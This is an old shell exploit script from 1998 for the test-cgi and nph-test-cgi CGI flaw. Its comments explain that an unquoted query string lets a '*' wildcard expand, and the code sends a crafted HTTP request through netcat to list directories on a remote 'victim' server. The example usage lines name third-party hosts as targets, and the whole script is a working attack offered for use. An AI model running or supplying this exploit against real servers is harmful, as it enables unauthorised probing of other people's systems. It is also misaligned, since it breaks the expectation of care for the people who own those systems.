#!/bin/sh
#
# test-cgi '98 by Jimmy J
#
# Required:
#  nc (netcat) ftp://ftp.avian.org/src/hacks/nc110.tgz
#
# Example:
#  test-cgi www1.mailbox.co.uk
#  test-cgi www.netbenefit.co.uk:8080 /
#
#  test-cgi www2.netlink.co.uk:80/cgi-bin/nph-test-cgi /etc/
#
# Problem:
# $QUERY_STRING isn't defined with double quotes in old versions allowing
# wildcard expansion.
#
# Impact:
# An attacker can remotely list directories on the victim machine.
#
# Notes:
#
# This script shoves a * into $QUERY_STRING which gets expanded by sh
# to the directory contents, basically doing an "echo *".
#
# nph-test-cgi is vulnerable to the same problem.
#
# I didn't see anyone release anything useful for the test-cgi hole so here
# it is.
#
# Later.
#

usage() {
	echo "Usage: `basename $0` <host>[:port/cgi-bin/nph-test-cgi] [/directory/]" 1>&2
	exit 1
}

victim=$1
port=80

if [ -z "$victim" ]; then
	usage
fi

cgi=/cgi-bin/test-cgi

if echo $victim | grep ":" 1>/dev/null; then
	if echo $victim | grep "/" 1>/dev/null; then
		port="`echo $victim | cut -f1 -d "/" | cut -f2 -d ":"`"
		cgi="/`echo $victim | cut -f2- -d "/"`"
		victim=`echo $victim | cut -f1 -d ":"`
	else
		port=`echo $victim | cut -f2 -d ":"`
		victim=`echo $victim | cut -f1 -d ":"`
	fi
fi

directory=$2

if [ -z $directory ]; then
	remotedir="current directory"
else
	remotedir=$directory
fi

echo "Trying $victim:$port$cgi... ["$remotedir"]"
echo "GET $cgi?' $directory* ' HTTP/1.0
Host: $victim
Accept: text/html, text/plain, application/x-wais-source, */*
User-Agent: Lynx/2.5  libwww/2.14
Referer: http://$victim/

" | nc -v $victim $port 


